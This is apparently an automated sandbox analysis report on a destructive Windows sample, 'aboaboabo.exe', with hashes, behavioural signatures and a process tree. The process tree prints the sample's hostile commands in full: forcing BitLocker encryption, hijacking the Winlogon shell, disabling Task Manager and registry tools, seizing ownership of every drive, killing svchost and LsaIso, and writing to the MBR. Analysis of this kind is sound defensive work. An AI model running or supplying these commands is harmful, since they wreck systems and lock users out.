Analysis
-
max time kernel
0s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system -
submitted
27-11-2024 09:38
Behavioral task
behavioral1
Sample
aboaboabo.exe
Resource
win11-20241023-en
windows11-21h2-x64
6 signatures
150 seconds
Errors
Reason
Machine shutdown
General
-
Target
aboaboabo.exe
-
Size
102KB
-
MD5
099d08e56a00ee754ca42a63f03f3bf0
-
SHA1
9cd9254c2d43b3f660a72046161f47e7249bcd5f
-
SHA256
0e01c4845c1a6d26bd24549fb0bd493a9c037c44b6c450ba6e68bb8f01287e35
-
SHA512
bc39bd4b5e8c0f2b50f3c1b0ccfe56023f4dc2f8df669285e4d5a203f74da7a83d49181d2705252d944655a29656f10a25e13bbdcb127bf075aa12046f4f1f88
-
SSDEEP
1536:I7pLfBYvvrb8v20GiIPzW8WQVvB2UTsa0imYFU47o9Tuui:IpLmvPK207GcQlIvYFx7oZo
Score
8/10
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid Process 2528 takeown.exe 2100 icacls.exe 4584 takeown.exe 3908 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid Process 2528 takeown.exe 2100 icacls.exe 4584 takeown.exe 3908 icacls.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
aboaboabo.exedescription ioc Process File opened for modification \??\PhysicalDrive0 aboaboabo.exe -
Processes:
resource yara_rule behavioral1/memory/2480-0-0x00007FF7B7980000-0x00007FF7B79B1000-memory.dmp upx -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid Process 3656 taskkill.exe 1988 taskkill.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
aboaboabo.exedescription pid Process procid_target PID 2480 wrote to memory of 2820 2480 aboaboabo.exe 80 PID 2480 wrote to memory of 2820 2480 aboaboabo.exe 80 PID 2480 wrote to memory of 3552 2480 aboaboabo.exe 81 PID 2480 wrote to memory of 3552 2480 aboaboabo.exe 81 PID 2480 wrote to memory of 2112 2480 aboaboabo.exe 82 PID 2480 wrote to memory of 2112 2480 aboaboabo.exe 82 PID 2480 wrote to memory of 1640 2480 aboaboabo.exe 83 PID 2480 wrote to memory of 1640 2480 aboaboabo.exe 83 PID 2480 wrote to memory of 2528 2480 aboaboabo.exe 84 PID 2480 wrote to memory of 2528 2480 aboaboabo.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\aboaboabo.exe"C:\Users\Admin\AppData\Local\Temp\aboaboabo.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SYSTEM32\manage-bde.exemanage-bde -on C: -EncryptionMethod AES-2562⤵PID:2820
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "TASKKILL /F /IM svchost.exe && shutdown /r /f /t 0" /f2⤵PID:3552
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:2112
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵PID:1640
-
-
C:\Windows\SYSTEM32\takeown.exetakeown /f D:\ /r /d Y2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2528
-
-
C:\Windows\SYSTEM32\icacls.exeicacls D:\ /grant Everyone:F /t /c /l2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3908
-
-
C:\Windows\SYSTEM32\takeown.exetakeown /f C:\ /r /d Y2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4584
-
-
C:\Windows\SYSTEM32\icacls.exeicacls C:\ /grant Everyone:F /t /c /l2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2100
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /T /IM LsaIso.exe2⤵
- Kills process with taskkill
PID:1988
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /T /IM svchost.exe2⤵
- Kills process with taskkill
PID:3656
-